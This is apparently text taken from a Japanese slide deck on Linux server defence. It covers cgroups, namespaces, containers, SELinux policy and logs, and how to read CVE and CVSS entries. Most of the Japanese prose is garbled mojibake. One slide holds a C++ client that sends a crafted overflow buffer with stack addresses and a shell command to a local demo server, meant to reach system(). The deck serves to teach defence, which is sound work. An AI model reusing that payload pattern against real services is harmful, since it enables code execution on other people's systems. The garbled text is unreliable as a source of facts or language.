ࢦఆͨ͠ϓϩηεάϧʔϓͰ
࡞Ͱ͖Δϓϩηεͷ࠷େΛ੍ݶ͢Δ
ϓϩηε
/bin/ls
execl("/bin/ls","/bin/ls",nullptr );
ىಈ
άϧʔϓͷϓϩηε͕࠷େʹୡ͍ͯ͠Δҝ
ࢠϓϩηεͷੜΛڋ൱
Slide 80
Slide 80 text
tcp::socket socket(io_service);
socket.connect(
tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
);
const std::vector< uint8_t > command{
't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
std::vector< uint8_t > data {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
};
for( size_t i = 0u; i != 10u; ++i )
std::copy( command.begin(), command.end(), std::back_inserter( data ) );
data.push_back( 0x0d );
ࡉͨ͠σʔλΛૹΔΫϥΠΞϯτ
system()
γΣϧεΫϦϓτ
߈ܸऀ͕όοϑΝΦʔόʔϥϯ͔Β
ҙͷॲཧͷ࣮ߦʹܨ͛Δ࠷खܰͳํ๏system()
தͰࢠϓϩηεΛੜ͍ͯ͠Δҝ
ࢠϓϩηε͕ੜग़དྷͳ͍ͱ߈ܸ͕େม໘ʹͳΔ
Slide 81
Slide 81 text
$ g++ sample.c -o sample
$ ./sample
bin dev home lib32 lost+found mnt proc run sys usr
boot etc lib lib64 media opt root sbin tmp var
ޭ
$ cgcreate -g pids:test
$ cgset -r pids.max=1 test
$ cgexec -g pids:test ./sample
ࣦഊ
$
#include
#include
int main() {
if( system( "ls /" ) == 0 ) std::cout << "ޭ" << std::endl;
else std::cout << "ࣦഊ" << std::endl;
}
system()͕ػೳ͢ΔͱϧʔτσΟϨΫτϦͷ༰Λදࣔ͢ΔϓϩάϥϜ
ͬ͢ͽΜͰಈ͔͢ͱදࣔ͞ΕΔ
testͱ͍͏໊લͷpidsʹؔ͢Δ৽͍͠cgroupΛ࡞Δ
testͷ࠷େϓϩηεΛ1ʹ͢Δ
cgroupΛtestʹͯ͠ಈ͔͢ͱ
system()ʹࣦഊ͢Δ
Slide 82
Slide 82 text
ͨͩ͜͠ͷ੍ݶΛ͔͚Δͱ
αʔόͷຊདྷͷ༻్Ͱࢠϓϩηε͕࡞Εͳ͘ͳΔ
͜ͷख͕͑Δͷ
໌Β͔ʹࢠϓϩηεΛඞཁͱ͠ͳ͍αʔϏεʹݶΒΕΔ
Slide 83
Slide 83 text
devices cgroups
ࢦఆͨ͠ϓϩηεάϧʔϓ͔Β
৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ
αʔό
γΣϧ
ىಈ
ࠓ߈ܸऀҰൠϢʔβͰͷγΣϧͷىಈʹޭ͠
αϯυσόΠεͷ੬ऑੑΛಥ͍ͯ
rootΛऔΖ͏ͱ͍ͯ͠Δ
CVE-2017-15265
߈ܸऀ
੬ऑͳ
Linux
Slide 84
Slide 84 text
devices cgroups
ࢦఆͨ͠ϓϩηεάϧʔϓ͔Β
৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ
αʔό
γΣϧ
ىಈ CVE-2017-15265
߈ܸऀ
͜ͷάϧʔϓʹαϯυσόΠε͍Βͳ͍ഺͳͷͰ
αϯυσόΠεΛ৮͍͚ͬͯͳ͍ ੬ऑͳ
Linux
͜͏͍͏੍ݶΛ͋Β͔͡Ί͔͚Δࣄ͕Ͱ͖Δ
Slide 85
Slide 85 text
໊લۭؒ
ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηε͔Β
Կ͕ݟ͑Δ͔Λ੍ݶ͢Δ
init!"!5*[agetty]
#!busybox
#!login!!!bash!!!top
#!sshd!"!sshd!!!sshd!!!bash!!!pstree
$ %!sshd!!!sshd!!!bash!!!vim
%!udevd
ྫ:
͜ͷൣғͷϓϩηεʹ
֎ͷϓϩηε͕ݟ͑ͳ͍
(PID໊લۭؒ)
bash!!!vim
͜ͷ໊લۭؒʹͱͬͯͷPID1
ຊͷPID1
Slide 86
Slide 86 text
Ϛϯτ໊લۭؒ
Ͳ͜ʹԿ͕Ϛϯτ͞Ε͍ͯΔ͔ͷใΛ
ϓϩηε͔Β͢Δ
ϓϩηε
ࢠϓϩηε
IPHF
GVHB
IPHF
GVHB
ϓϩηε͔Βݟ͑Δ/hoge/fuga
ࢠϓϩηε͔Βݟ͑Δ/hoge/fuga
chrootumountͱΈ߹ΘͤΔࣄͰ
ࢠϓϩηε͔ΒϓϩηεͷσΟϨΫτϦπϦʔͷଘࡏΛ
ݟ͑ͳ͘͢Δࣄ͕Ͱ͖Δ
Slide 87
Slide 87 text
Ϛϯτ໊લۭؒ
IPHF
GVHB
߈ܸʹ͑ͦ͏ͳΜ͕
ͳΜͳ͍…
αʔόΛಈ͔͢ͷʹඞཁͳ࠷খݶͷϑΝΠϧ͚͕ͩݟ͑Δ
σΟϨΫτϦπϦʔΛ/ͱͯ͠αʔόΛಈ͔͢ࣄͰ
߈ܸऀͷબࢶΛڱΊΔࣄ͕Ͱ͖Δ
߈ܸऀ
Slide 88
Slide 88 text
UID໊લۭؒ
ಛఆͷ໊લۭؒʹଐ͢ϓϩηεͷΈʹ
௨༻͢ΔrootΛ࡞Γग़͢
߈ܸऀ
Զࠓ͔Β
rootͩ!
Slide 89
Slide 89 text
UID໊લۭؒ
ಛఆͷ໊લۭؒʹଐ͢ϓϩηεʹͷΈ
௨༻͢ΔrootΛ࡞Γग़͢
߈ܸऀ
rootͷ໋ྩͩͧ! ͋ͳͨͦͷ○ͷதͰͷΈ
rootͳͷͰμϝͰ͢
Slide 90
Slide 90 text
໊લۭؒ
͜ͷଞʹ
ωοτϫʔΫͷઃఆ
cgroupͷઃఆ
ଓͰ͖Δϓϩηεؒ௨৴
։͍͍ͯΔϑΝΠϧσΟεΫϦϓλ
ͳͲ৭ΜͳͷΛ
ϓϩηεͱࢠϓϩηεͰผʹ͢Δࣄ͕Ͱ͖Δ
Slide 91
Slide 91 text
طʹ
ؾ͍͍ͮͯΔ͔͠Εͳ͍͕
Slide 92
Slide 92 text
cgroupͱ໊લۭؒΛ׆༻ͯ͠
ϓϩηεͱࢠϓϩηεʹݟ͑Δ
Ͱ͖ΔࣄΛશʹͨ͠ͷ͕
LinuxͷίϯςφͰ͋Δ
Slide 93
Slide 93 text
ϓϩηεͱࢠϓϩηεͷશͳͷઃఆΛ
؆୯ʹͰ͖ΔΑ͏ʹ͍ͯ͠Δͷ͕
ྲྀߦΓͷDockerͰ͋Δ
https://www.docker.com/
Slide 94
Slide 94 text
ίϯςφͱϚΠΫϩαʔϏε
cgroupͱ໊લۭؒϓϩηε୯ҐͰઃఆ͞ΕΔ
1ͭͷڊେͳϓϩηεͰ
αʔϏεΛఏڙ͢ΔΑΓ
୯७ͳػೳΛఏڙ͢ΔαʔόΛ
ωοτϫʔΫͰܨ͍Ͱ
େ͖ͳαʔϏεΛ࡞Δํ͕
ݸʑͷϓϩηεʹ༩͑Δ
ݖݶΛΑΓখ͘͢͞Δࣄ͕Ͱ͖Δ
Slide 95
Slide 95 text
ίϯςφͱϚΠΫϩαʔϏε
͜ͷΑ͏ͳߏʹͯ͋͠Δͱ
ϓϩηεͷ͏ͪͷ1͕ͭ
Ծʹ߈ܸऀͷखʹམͪͨͱͯ͠
ͦͷ࣌ͰͷӨڹΛ
αʔϏεͷݶΒΕͨྖҬʹ
ͱͲΊΒΕΔ
Slide 96
Slide 96 text
ͨͩ͠
ͨ·ʹcgroupͱ໊લۭؒࣗମͷෆ۩߹Ͱ
߈ܸऀ͕ίϯςφͷ֎ʹग़Ͱ͖ͯ͠·͏
੬ऑੑ͕ݟ͔ͭΔࣄ͕͋ΔͷͰҙ
ྫ$7&
Slide 97
Slide 97 text
SELinuxΛ׆༻ͤΑ
Slide 98
Slide 98 text
ॴ༗ऀ: Bob
άϧʔϓ: ΧϨʔಉձ
ύʔϛογϣϯ: ॴ༗ऀͱ
άϧʔϓϝϯόʔ
ಡΈॻ͖OK
ݹయతͳ*NIXͷύʔϛογϣϯ
ΧϨʔใ
Alice
(ΧϨʔಉձձһ)
"MJDF͞Μάϧʔϓϝϯόʔ
άϧʔϓϝϯόʔͷॻ͖ࠐΈ0,
Linux
OK
͋ͷϑΝΠϧʹ
ॻ͖͍ͨ
Slide 99
Slide 99 text
͜ͷΑ͏ʹϢʔβ͕ࣗͰ
ใΛʹΞΫηε͢ΔͨΊʹඞཁͳݖݶΛઃఆ͢Δ
ΞΫηε੍ޚΛ
ҙΞΫηε੍ޚ
ͱݺͿ
Slide 100
Slide 100 text
ॴ༗ऀ: Bob
άϧʔϓ: ΧϨʔಉձ
ύʔϛογϣϯ: ॴ༗ऀͱ
άϧʔϓϝϯόʔ
ಡΈॻ͖OK
ΧϨʔใ
BobΛࣗশ͢Δ
߈ܸऀ #PC͞Μ
ϑΝΠϧͷॴ༗ऀ͔ͩΒ
#PC͞ΜͷཁٻͳΒؒҧ͍ͳ͍
Linux
͋ͷϑΝΠϧΛ
ࣺͯͨ͘ͳͬͨ
OK
ݹయతͳ*NIXͷύʔϛογϣϯͷݶք
Slide 101
Slide 101 text
ॴ༗ऀ: Charlie
άϧʔϓ: ΧϨʔಉձ
ύʔϛογϣϯ: ୭ͰಡΈॻ͖ࣗ༝
ۃൿใ
Charlie
$IBSMJF͞Μ
ϑΝΠϧͷॴ༗ऀ͔ͩΒ
$IBSMJF͞ΜͷཁٻͳΒؒҧ͍ͳ͍
Linux
OK
*NIXΑʔΘ͔ΒΜ
777ʹ͠ͱ͍ͯ
ݹయతͳ*NIXͷύʔϛογϣϯͷݶք
Slide 102
Slide 102 text
γεςϜཧऀ͕γεςϜશମʹ
ηΩϡϦςΟཁ݅Λڧ੍͢Δ
ڧ੍ΞΫηε੍ޚ
͕ཁΔ
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
Charlie͕ͲΜͳʹζϘϥͰ
γεςϜશମͷηΩϡϦςΟอͨΕΔඞཁ͕͋Δ
Slide 103
Slide 103 text
୭͔ͩΒʙ͕Ͱ͖Δ
ͱ͍͏ܗҎ֎ͷํ๏ʹΑΔΞΫηε੍ޚ͕ཁΔ
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
BobຊਓͱBobʹͳΓ͢·͢߈ܸऀΛ۠ผ͢Δʹ
୭͔͍ʹͳΒͳ͍
Slide 104
Slide 104 text
શͯͷϓϩηεʹࢠ͕ؔ͋Δ
͋ΔͷBob͞Μͷϓϩηε
Bob
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
ΰϛା͕Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
ՈͷআΛ͢Δ
Slide 105
Slide 105 text
ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ
ΧϨʔಉձͷϊʔτʹམॻ͖Λ͢Δ
ΰϛା͕Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
ՈͷআΛ͢Δ
Bob
BobʹͳΓ͢·ͨ͠
߈ܸऀ
ϓϩηε͕߈ܸऀͷखʹམͪΔͱ
͜͏͍͏ঢ়ଶʹͳΔ
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
Slide 106
Slide 106 text
ΰϛା͕Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
ՈͷআΛ͢Δ
ϓϩηεʹυϝΠϯΛ͚ͭΑ͏
υϝΠϯ͋Β͔͡Ί༻ҙ͞Εͨϧʔϧʹैͬͯ༩͞Ε
ࢠϓϩηεʹҾ͖ܧ͕Ε
SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍ϢʔβมߋͰ͖ͳ͍
Bob আத
আத ͜Ε
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
Slide 107
Slide 107 text
আத ʹΞΫηεͯ͠ྑ͍ͷ
ϦιʔεʹυϝΠϯ(λΠϓ)Λ͚ͭΑ͏
SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍ϢʔβมߋͰ͖ͳ͍
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
Slide 108
Slide 108 text
ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ
ΧϨʔಉձͷϊʔτʹམॻ͖Λ͢Δ
ՈͷআΛ͢Δ
Bob
ΰϛା͕Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
BobʹͳΓ͢·ͨ͠
߈ܸऀ
͢Δͱ߈ܸऀͷϓϩηε͜͏ͳΔ
আத
আத
আத
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
Slide 109
Slide 109 text
Linux
ͳΜ͚ͩͲ
ΧϨʔಉձͷϊʔτʹॻ͖ࠐΈͤͯ͞
আ͍ͤ
υϝΠϯͷෆҰகΛཧ༝ʹ
ใͷΞΫηεΛڋ൱Ͱ͖Δ
BobʹͳΓ͢·ͨ͠
߈ܸऀ
আத
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
Slide 110
Slide 110 text
ॏཁͳϙΠϯτ
୭͔ͩΒڐՄ͢Δ
Ͱͳ͘
ԿΛ͍ͯ͠Δ࠷த͔ͩΒڐՄ͢Δ
ʹͳ͍ͬͯΔ
Slide 111
Slide 111 text
Æ
SELinux
ύʔϛογϣϯ
system_u:object_r:
passwd_exec_t
Bob
ॴ༗ऀ: Bob
ॴ༗ऀͷಡΈॻ͖OK
ಡΜͰOK
㲔
SELinux
passwd_exec_t
ಡΜͰྑ͍
ಡΜͰOK
૯ධ
ಡΜͰOK
͋ͷϑΝΠϧ
ݟͤͯ
#PC͞Μ͕ࣗͰ
ઃఆͰ͖Δൣғ
SELinux
passwd_exec_t
͍͚ͬͯͳ͍
༻ېࢭ
૯ධ
༻ېࢭ
8080
8080൪ϙʔτΛ
͍͍ͨͳ
Slide 112
Slide 112 text
$ sesearch --allow
…
allow passwd_t crack_db_t:dir { getattr ioctl lock open read search };
allow passwd_t crack_db_t:file { getattr ioctl lock open read };
allow passwd_t default_context_t:dir { getattr open search };
allow passwd_t device_t:dir { getattr ioctl lock open read search };
…
allow passwd_t shadow_t:file { append create getattr ioctl link lock open read relabelfrom relabelto rename
setattr unlink write };
…
allow passwd_t passwd_exec_t:file { entrypoint execute getattr ioctl lock map open read };
…
allow user_t passwd_exec_t:file { execute getattr open read };
allow user_t passwd_t:process transition;
…
ҰൠϢʔβ͕ී௨ʹϩάΠϯ͖ͯͨ͠ঢ়گ͔Β
passwd_exec_tʹଐ͢ίϚϯυΛ࣮ߦ͢Δࣄ͕Ͱ͖Δ
passwd_tυϝΠϯͷભҠ͕ೝΊΒΕΔ
passwd_exec_tʹ
ଐ͢ίϚϯυͷ࣮ߦ࣌ʹ
passwd_tʹભҠ͢Δ
passwd_tυϝΠϯͰpasswdΛ࣮ߦ͢Δͷʹඞཁͳͷ͔͠৮Εͳ͍
passwd_tͷϓϩηε
shadow_tλΠϓͷ
ύεϫʔυϑΝΠϧΛ৮ΕΔ
Slide 113
Slide 113 text
passwd
ύεϫʔυϑΝΠϧ
ਖ਼نͷϩάΠϯखॱͰ
ೖ͖ͬͯͨϢʔβ
ύεϫʔυͱ
ؔͳ͍
ϑΝΠϧ
shadow_tͷΞΫηεݖ͕ͳ͍
ແؔͳϑΝΠϧͷ
ΞΫηεݖ͕ͳ͍
passwd_tʹભҠ
Bob
ਖ਼نͷϩάΠϯखॱͰ
ೖͬͯ͜ͳ͔ͬͨϢʔβ
passwd_tʹ
ભҠ͢Δݖݶ͕ͳ͍
shadow_tͷ
ΞΫηεݖ͕ͳ͍
BobʹͳΓ͢·͢߈ܸऀ
passwd_tshadow_tΛ৮ΕΔ
Slide 114
Slide 114 text
SELinuxͷઃఆΛదʹߦ͏ࣄͰ
߈ܸऀ͕ϓϩηεΛͬऔͬͨͱͯ͠
ͦͷӨڹΛ
͔ͦ͜ΒભҠͰ͖ΔυϝΠϯ͚ͩʹ
ݶఆͰ͖Δ
Slide 115
Slide 115 text
SELinux͕ΞΫηεΛڋ൱͢Δͱ
ҎԼͷΑ͏ͳΧʔωϧϩά͕ग़Δ
audit: type=1400 audit(1521959710.081:83): avc: denied
{ setattr } for pid=2168 comm="chmod" name="shadow" dev="vda"
ino=524679 scontext=staff_u:staff_r:staff_t
tcontext=system_u:object_r:shadow_t tclass=file
passwd_tҎ֎ͷυϝΠϯͰ࣮ߦ͞Εͨ
ίϚϯυchmod͕
shadow_tλΠϓ͕͍ͭͨϑΝΠϧshadowͷ
ύʔϛογϣϯΛॻ͖͑Α͏ͱͨ͠ҝ
ڋ൱ͨ͠
Slide 116
Slide 116 text
audit: type=1400 audit(1521959710.081:83): avc: denied
{ setattr } for pid=2168 comm="chmod" name="shadow" dev="vda"
ino=524679 scontext=staff_u:staff_r:staff_t
tcontext=system_u:object_r:shadow_t tclass=file
ιϑτΣΞʹ͜ͷૢ࡞Λ͖͢ਖ਼ͳཧ༝͕͋Δ߹
ͦͷιϑτΣΞͷҝͷ৽͍͠υϝΠϯΛ࡞Ζ͏
ͦͷιϑτΣΞ͕ਖ਼ৗʹΘΕΔͱ͖ʹ
ͦͷυϝΠϯʹભҠͰ͖ΔݖݶΛ༩͑Α͏
ͦͷυϝΠϯʹඞཁͳૢ࡞Λߦ͏ݖݶΛ༩͑Α͏
Slide 117
Slide 117 text
࣮ࡍͷSELinuxͷઃఆखॱ͘ͳΔͷͰׂѪ
ίϚϯυઃఆϑΝΠϧͷ͍ํ
RedHatͷυΩϡϝϯτʹΑ͘·ͱ·͍ͬͯΔ
https://access.redhat.com/documentation/ja-jp/red_hat_enterprise_linux/7/html/
selinux_users_and_administrators_guide/
͜͜ʹ
3FE)BUͷ4&-JOVYϢʔβʔͱཧऀͷΨΠυΛషΔ
Slide 118
Slide 118 text
RedHatҎ֎ͷσΟετϦϏϡʔγϣϯΛ͏߹
γεςϜͷϢʔβλΠϓ໊ɺͦͷݖݶͷൣғ͕
ҟͳ͍ͬͯΔՄೳੑ͕͋Δ
༻͢ΔσΟετϦϏϡʔγϣϯʹ
SELinuxʹؔ͢Δઆ໌͕͋Δ߹
ͦͪΒࢀর͢͠
Slide 119
Slide 119 text
੬ऑੑใͷ͍ํ
Slide 120
Slide 120 text
αʔό্Ͱಈ͍͍ͯΔͷ͕
ࣗͰ࡞ͬͨιϑτΣΞ͚ͩ
ͱ͍͏έʔεكͰ͋Δ
ࣗͰ࡞ͬͨιϑτΣΞ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
Χʔωϧ(OS)
υϥΠό υϥΠό
ϋʔυΣΞ ϋʔυΣΞ
ศརͳϥΠϒϥϦ
Slide 121
Slide 121 text
ࣗͰ࡞͍ͬͯͳ͍෦Ͱ੬ऑੑ͕ݟ͔ͭͬͯ
ࣗͷιϑτΣΞ͕҆શͰͳ͘ͳΔ͜ͱΑ͋͘Δ
ࣗͰ࡞ͬͨιϑτΣΞ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
Χʔωϧ
υϥΠό υϥΠό
ϋʔυΣΞ ϋʔυΣΞ
ศརͳϥΠϒϥϦ
Slide 122
Slide 122 text
ར༻͍ͯ͠Δ
ΑͦͷιϑτΣΞͷ
੬ऑੑใΛؾʹ͔͚Α͏
Slide 123
Slide 123 text
Common Vulnerabilities and Exposures
ڞ௨੬ऑੑࣝผࢠ ུͯ͠$7&
ੈքதͰݟ͔ͭͬͨ੬ऑੑʹ
Ұҙͳ*%ΛׂΓͯͯσʔλϕʔεԽ͍ͯ͠Δ
http://www.cve.mitre.org/
͜͜ʹ
$7&ͷ8FCαΠτͷτοϓϖʔδΛషΔ
Slide 124
Slide 124 text
Common Vulnerabilities and Exposures
BQBDIFͰݕࡧΛ͔͚ͯΈͨͱ͜Ζ
http://www.cve.mitre.org/cve/search_cve_list.html
͜͜ʹ
$7&ͷ8FCαΠτͰBQBDIFͰݕࡧΛ͔͚ͨͱ͜ΖΛషΔ
Slide 125
Slide 125 text
͜͜ʹ
$7&ͷ/*45ʹΑΔղઆΛషΔ
Common Vulnerabilities and Exposures
"QBDIFIUUQEͷIUBDDFTTʹ-JNJUΛઃఆ͍ͯ͠Δ߹ʹ
ϦϞʔτ͔Βݟ͍͚͑ͯͳ͍ใ͕ݟ͑ͯ͠·͏Մೳੑ͕͋Δ੬ऑੑ
6TFBGUFSGSFF੬ऑੑͰ͋Γ
ඞͣ͠ݟ͍͚͑ͯͳ͍ใ͕ૹΒΕΔ༁Ͱͳ͍
https://nvd.nist.gov/vuln/detail/CVE-2017-9798
Slide 126
Slide 126 text
Common Vulnerability Scoring System
https://nvd.nist.gov/vuln/detail/CVE-2017-9798
ڞ௨੬ऑੑධՁγεςϜ(ུͯ͠CVSS)
੬ऑੑͷϠό͞Λʹͨ͠ͷ
͜ΕΛݟΕ੬ऑੑͷΈ͕Θ͔Βͳͯ͘
Ͳͷ͘Β͍·͍ͣࣄʹͳ͍ͬͯΔ͔͕Θ͔Δ
͜͜ʹ
$7&ͷ$744ΛషΔ
Slide 127
Slide 127 text
Common Vulnerability Scoring System
جຊධՁج४(Base Metrics)
੬ऑੑͦͷͷͷಛʹجͮ͘είΞ
͜͜ͷ͕ߴ͍ఔରʹେ͕݀։͍͍ͯΔ
ݱঢ়ධՁج४ (Temporal Metrics)
੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
͜ͷঢ়گͷมԽʹԠͯ͡มΘΔ
ڥධՁج४(Environmental Metrics)
੬ऑੑ͕ར༻͞Εͨ߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
͜ͷର͕ར༻͞Ε͍ͯΔڥʹΑͬͯมΘΔ
Slide 128
Slide 128 text
Common Vulnerability Scoring System
جຊධՁج४(Base Metrics)
੬ऑੑͦͷͷͷಛʹجͮ͘είΞ
͜͜ͷ͕ߴ͍ఔରʹେ͕݀։͍͍ͯΔ
ݱঢ়ධՁج४ (Temporal Metrics)
੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
͜ͷঢ়گͷมԽʹԠͯ͡มΘΔ
ڥධՁج४(Environmental Metrics)
੬ऑੑ͕ར༻͞Εͨ߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
͜ͷର͕ར༻͞Ε͍ͯΔڥʹΑͬͯมΘΔ
͜͜ʹ
$7&ͷ$744ΛషΔ
࣌ͱॴʹґΒͳ͍جຊධՁج४ͷείΞ͕
੬ऑੑใͱͯ͠ެ։͞Ε͍ͯΔ
Slide 129
Slide 129 text
جຊධՁج४ (Base Metrics)
߈ܸݩ۠(Access Vector)
߈ܸऀͲ͔͜Β߈ܸΛߦ͏ඞཁ͕͋Δ͔
ϩʔΧϧ ಉҰηάϝϯτ ωοτϫʔΫͷͲ͔͜ΒͰ
߈ܸ݅ͷෳࡶ͞(Access Complexity)
߈ܸͰ͖Δঢ়ଶʹ͢Δͷ͍͔͠
ಛผͳઃఆ͕ΘΕͯΔ͚࣌ͩ ࣄલʹԿ͔Λ͍ͬͯΔඞཁ͕͋Δ
ඞཁͳಛݖϨϕϧ(Privileges Required)
߈ܸΛߦ͏ʹͲͷఔͷݖݶ͕ඞཁ͔
ҰൠϢʔβݖݶ͕ඞཁ ཧऀݖݶ͕ඞཁ
Slide 130
Slide 130 text
جຊධՁج४ (Base Metrics)
Ϣʔβؔ༩Ϩϕϧ(User Interaction)
߈ܸΛཱͤ͞ΔͨΊʹਖ਼نͷϢʔβʹԿ͔Λͤ͞Δඞཁ͕͋Δ͔
ࡉΛͨ͠8FCϖʔδΛ։͔ͤΔඞཁ͕͋Δ
είʔϓ(Scope)
߈ܸΛड͚ͨίϯϙʔωϯτҎ֎ͷ߈ܸͷ͕͔Γʹ͞ΕΔՄೳੑ͕͋Δ͔
ΫϩεαΠτεΫϦϓςΟϯάͳͲ͕͜Εʹ֘͢Δ
Slide 131
Slide 131 text
جຊධՁج४ (Base Metrics)
શੑͷӨڹ(Integrity Impact)
߈ܸऀରͷใΛվ᜵Ͱ͖Δ͔
վ᜵Ͱ͖Δใͷதʹػີใؚ·ΕಘΔ
Մ༻ੑͷӨڹ(Availability Impact)
߈ܸऀαʔϏεΛఀࢭͤ͞Δࣄ͕Ͱ͖Δ͔
Ұ෦ͷػೳΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ શʹఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ
ػີੑͷӨڹ(Confidentiality Impact)
߈ܸऀʹݟ͍͚͑ͯͳ͍ใ͕ݟ͑ͯ͠·͏͔
ݟ͑ͯ͠·͏ใͷதʹػີใؚ·ΕಘΔ
Slide 132
Slide 132 text
͜͜ʹ
$7&ͷ$744ΛషΔ
Apach httpdͷ੬ऑੑCVE-2017-9798ͷ߹
ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ
߈ܸ؆୯
߈ܸʹݖݶಛʹඞཁͳ͠
ϢʔβʹԿ͔ͤ͞Δඞཁͳ͠
Αͦͷ߈ܸͷ͕͔ΓʹͳΒͳ͍
ػີใ͕࿙ΕΔ
ใͷվ͟ΜͰ͖ͳ͍
Մ༻ੑΛଛͶΔ͜ͱͰ͖ͳ͍
ۓٸ: 7.5/10.0 (ߴ)
݁ߏϠό͍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏
https://nvd.nist.gov/vuln/detail/CVE-2017-9798
Slide 133
Slide 133 text
͜͜ʹ
$7&ͷ$744ΛషΔ
BINDͷ੬ऑੑCVE-2016-2776ͷ߹
ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ
߈ܸ؆୯
߈ܸʹݖݶಛʹඞཁͳ͠
ϢʔβʹԿ͔ͤ͞Δඞཁͳ͠
Αͦͷ߈ܸͷ͕͔ΓʹͳΒͳ͍
ใ࿙Εͳ͍
ใͷվ͟ΜͰ͖ͳ͍
Մ༻ੑΛશʹଛͶΔࣄ͕Ͱ͖Δ
ۓٸ: 7.5/10.0 (ߴ)
݁ߏϠό͍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏
https://nvd.nist.gov/vuln/detail/CVE-2016-2776
Slide 134
Slide 134 text
͜͜ʹ
$7&ͷ$744ΛషΔ
Firefoxͷ੬ऑੑCVE-2016-5253ͷ߹
ϩʔΧϧ͔Β߈ܸͰ͖Δ
߈ܸ؆୯Ͱͳ͍
ҰൠϢʔβݖݶ͕ཁΔ
ϢʔβʹԿ͔ͤ͞Δඞཁͳ͠
Αͦͷ߈ܸͷ͕͔ΓʹͳΒͳ͍
ใ࿙Εͳ͍
ػີใͷվ͟Μ͕Ͱ͖Δ
Մ༻ੑΛଛͶΔࣄͰ͖ͳ͍
ۓٸ: 4.7/10.0 (த)
੬ऑੑʹҧ͍ͳ͍͚ͲϠό͍ͭͰͳͦ͞͏
https://nvd.nist.gov/vuln/detail/CVE-2016-5253
Slide 135
Slide 135 text
͜͜ʹ
SFEIBUͷ੬ऑੑใͷϖʔδΛషΔ
ۓٸͷߴ͍੬ऑੑ͕ݟ͔ͭΔͱ֤σΟετϦϏϡʔγϣϯ͔Β
Ͳ͏͢Ε࠹͛Δ͔ʹؔ͢Δใ͕ग़Δ
https://access.redhat.com/security/cve/cve-2016-2776 https://security-tracker.debian.org/tracker/CVE-2016-2776
͜͜ʹ
EFCJBOͷ੬ऑੑใͷϖʔδΛషΔ
Slide 136
Slide 136 text
͍ͬͯΔιϑτΣΞͷ੬ऑੑʹCVE ID͕ৼΒΕͨ
ͦͷIDʹ͍ͭͯৄࡉ͕ग़͍ͯͳ͍͔άάΖ͏
͍ͬͯΔιϑτΣΞͷ੬ऑੑͷৄࡉ͕ग़͍ͯͨ
CVSSΛݟͯӨڹΛධՁ͠Α͏
σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ͳ͔ͳ͔ग़ͳ͍
੬ऑੑͷৄࡉΛݟͯ
ͷػೳΛආ͚ͯαʔϏεΛఏڙͰ͖ͳ͍͔ݕ౼͠Α͏
σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ग़ͨ
ૣٸʹΞοϓσʔτ͠Α͏
Slide 137
Slide 137 text
௨৴ʹର͢Δ߈ܸʹඋ͑Δ
Slide 138
Slide 138 text
8J'J
Πϯλʔωοτ ଓઌ
ϗςϧͷWiFiΞΫηεϙΠϯτʹଓ͠·͢
Alice
Slide 139
Slide 139 text
8J'J
Πϯλʔωοτ ଓઌ
ϗςϧͷWiFiΞΫηεϙΠϯτʹଓ͠·͢
֎ʹग़Δʹ
Ͳ͜ʹ௨৴Λ͛Ε
ྑ͍Ͱ͔͢
ͦΕ
DHCP DISCOVER
